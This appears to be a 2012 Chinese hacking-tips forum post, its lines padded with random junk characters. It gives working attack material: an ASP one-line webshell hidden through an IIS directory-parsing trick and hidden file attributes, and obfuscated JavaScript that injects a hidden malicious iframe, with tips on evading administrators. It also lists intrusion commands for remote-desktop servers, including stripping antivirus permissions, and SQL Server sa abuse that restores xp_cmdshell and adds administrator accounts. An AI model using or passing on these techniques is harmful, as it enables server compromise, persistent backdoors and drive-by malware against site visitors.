0 F& z* A5 c" C6 z6 } {! w* N通过web访问ASP木马:http://ip/images../news.asp?action=login
, D' I- n _2 G如何删除非标准目录:rmdir images..\ /s! Q& H9 Z+ M% V0 v7 F
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:5 K6 K; A) x# L5 ~! t
mkdir programme.asp
% g$ N5 `# N$ d+ ]) Z3 H g新建1.txt文件内容:<!--#include file=”12.jpg”-->, s8 O2 X$ {& z; ^( K
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
- b" D4 G; K6 ^; ?/ F' Pattrib +H +S programme.asp7 c3 Z" e$ D: ~0 r6 @3 `( z
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
/ ~1 X0 \4 U4 _/ Z1 \6 T* i
, Z, q" L) p# ~7 a b( d+ s54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。. R7 ]' u) J2 K' m. x: t
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。( Z# V( f# i! N d; U
+ L ~9 u/ M9 ^9 l: K55、JS隐蔽挂马% e9 f) _# Z/ V3 ^& T
1.- x0 I# G9 j) A9 d- l z
var tr4c3="<iframe src=ht";
* W, x9 x* Z: ^" dtr4c3 = tr4c3+"tp:/";
( k. \. U$ G# z0 G% N, A; {tr4c3 = tr4c3+"/ww";
5 i# B" y# u6 ^: }tr4c3 = tr4c3+"w.tr4";
+ S; l: k0 Q( Itr4c3 = tr4c3+"c3.com/inc/m";" |8 K. l, M1 ~7 E6 v" H- {
tr4c3 = tr4c3+"m.htm style="display:none"></i";
$ J/ h6 n! c6 n5 m8 dtr4c3 =tr4c3+"frame>'";/ |8 f$ @4 W u
document.write(tr4c3);
& M1 f7 Y4 t9 L7 G, n' W避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。% ^+ s# t- M1 y* q. k
/ d( a& G! a* d# v' z3 h- l2.
) b4 E' h; V9 J' f- U3 z# Q6 E转换进制,然后用EVAL执行。如
* ~; ~' C3 F) ^' j& xeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
* _! L3 w" r/ l8 `* D+ ]不过这个有点显眼。
4 T; G# \$ `! |6 S) j5 z4 |! k: U3.
6 q3 s+ ^" W Wdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');6 G% r8 q& u) A6 e% o' Z! r8 I
最后一点,别忘了把文件的时间也修改下。: H; q" H) G7 C1 l/ K
1 Q4 a6 {; \. R( k6 T; y5 k {$ g C
56.3389终端入侵常用DOS命令) l9 i7 h7 l& F7 @' J* J
taskkill taskkill /PID 1248 /t7 R5 x$ e% G" I3 Z6 H) |
+ P2 }) u- q1 ^2 g4 `4 h
tasklist 查进程4 b% V5 q& A y: @. ~! b
% ^; z, S7 a+ \- d; ?' P
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限+ c! U. ~% @7 s
iisreset /reboot% T# R: i2 V5 f% F+ b j
tsshutdn /reboot /delay:1 重起服务器& \; r+ o4 Z& A8 u- r+ j
! x4 L# R' | V# M& [logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
5 |! p" P: l, y' s9 p. \4 n1 [( B/ c2 @) |" Q& R7 F7 n
query user 查看当前终端用户在线情况
$ Z1 V5 ^8 m6 G) Z& e! X; f2 n" s/ U6 v* S
要显示有关所有会话使用的进程的信息,请键入:query process *. {& x/ s4 H* P1 B0 k' P+ d+ O5 |: [
2 J) v% ?" h& F. s9 k5 f2 q6 g要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
: h% i) _5 ?9 A! j+ L, g2 R; j0 r7 p
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
- y& X6 [' a. c$ W: q, Q' D* k6 r3 f6 c: I
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
4 z( S0 @9 L7 N/ R$ a: z% b, f/ n+ ]
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
. K; F; X9 x- }3 S+ v4 h* ~' N# s. H) R0 n
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
8 V9 j* n. m0 M8 v' `4 G5 k/ A1 Q3 P, y
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。5 e5 A! n& y% e$ r: q2 W
! S {4 ?9 @7 Q& T! C( U3 p命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
( M$ a6 ^$ v) z( G* {# u, i2 n4 D1 \8 x. M7 [6 ]! |8 R6 v
56、在地址栏或按Ctrl+O,输入:/ O1 d, W! O( ]! l1 d) h0 Y
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
+ F0 h1 R2 \ |( W4 o+ c s
/ U w' I3 F# y3 }' n源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。. V% l3 M u' V" U( P5 }
4 o% N- q% _ n& k
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
3 K$ K$ P/ A! P% u+ a用net localgroup administrators是可以看到管理组下,加了$的用户的。
! N' A) {; E1 e* D4 V
: Q! j; t) U8 w1 {58、 sa弱口令相关命令6 x0 G4 l3 ?- F8 I6 C% ^: S
q. J& E5 G9 U' I6 p8 v一.更改sa口令方法: O* C0 q, H! S- o, |& h: \
用sql综合利用工具连接后,执行命令:! Z) K" U$ b: I4 N
exec sp_password NULL,'20001001','sa'
+ J/ k8 \1 _. R5 b6 I(提示:慎用!)
' o: d$ H, W* B: S: ~! C! C0 X5 `; i
二.简单修补sa弱口令.8 M* g# o! K9 w6 |
7 \8 s, p o" ?
方法1:查询分离器连接后执行:6 r! v8 p' }/ K$ ?& w, j
if exists (select * from
0 z' |& V- Q6 g. r5 _dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
9 e1 K0 ]8 o6 |3 R6 m, POBJECTPROPERTY(id, N'IsExtendedProc') = 1)& ]/ m/ G& _0 j: f/ |2 s
$ ]6 G6 j- f0 x/ Zexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'/ W5 S" \& K/ m8 i! t3 H
0 l) ~. I; @; m% ^, g9 B! Y" r
GO
/ O0 B* H( d7 y$ T
- {# T2 N9 L7 [4 ~' N然后按F5键命令执行完毕" C9 ^" X1 \! T3 s; }4 L+ X
( z+ N7 Z3 ?% z* D0 p
方法2:查询分离器连接后3 @' H# F6 C7 r8 j& g
第一步执行:use master( \ g6 j* b, X3 M' b$ m
第二步执行:sp_dropextendedproc 'xp_cmdshell'
4 N% R6 |+ v$ @# s s然后按F5键命令执行完毕
! d& Q9 q3 @6 V3 j6 w, [( {8 T7 L! y( p& j7 {1 Y
+ m4 z! K! v9 q5 c$ i三.常见情况恢复执行xp_cmdshell.- G) D. @3 G* S4 @1 e% e
( p/ v) U. k/ ~1 C
* D2 o, F- s8 k4 |0 B1 未能找到存储过程'master..xpcmdshell'.
! w" I1 }9 A5 K B0 i) i 恢复方法:查询分离器连接后,6 A' {' }; n( ?; r' O
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
0 F O! P6 ^8 E4 _第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
+ p' p3 k- M- C6 _, O$ L. j6 q然后按F5键命令执行完毕
8 _) d3 c M# |( ?; d* u+ Y5 [2 O: P. v) u5 L6 g' z B
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
" \3 c; b! o9 {0 G恢复方法:查询分离器连接后,+ [2 h# l6 r" b( s/ {1 G0 N- B% P
第一步执行:sp_dropextendedproc "xp_cmdshell"
4 z. p; m( x _第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- @1 f5 R+ T* a4 h$ p: ~& S8 L然后按F5键命令执行完毕: y( k P0 a8 _( A9 R' x, q2 L; u
% _1 u2 q* J5 n0 }5 N
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)' |$ O, E! P3 L8 k8 A7 ?2 w
恢复方法:查询分离器连接后,
5 f, {. p/ e& O. f6 }第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
, A: B* ~) }8 s, S. n* o第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' & x) P, G: [2 |; n( A
然后按F5键命令执行完毕
" p' W/ H8 ^) T+ z B" w+ L. }8 R1 r
四.终极方法.
7 H% v2 }$ z5 T. f6 l. `; ~' @8 x5 y如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
. a2 c1 R( v: i) q. }# Q查询分离器连接后,1 V! V( i' K* y+ L' y6 @, _$ [
2000servser系统:
2 r3 y c+ W$ s; bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
, p1 t: {' W0 n. P) ?
( S: W4 Q! o2 ~. n$ u3 Mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 C+ }9 a9 t3 u% C' g6 e
/ h7 E: y* x l5 R" H+ O& D
xp或2003server系统:. [7 t0 r. n- G' s" |3 U
6 {; G# s" t; ?' k3 g9 o0 c6 V, m) wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'4 n0 c( [( [/ I2 O6 U8 l9 S
4 s4 N8 K* r5 zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'4 \6 H: q1 p4 A4 _( S0 A
|
发表于 2012-9-15 14:51:03
收藏
支持
反对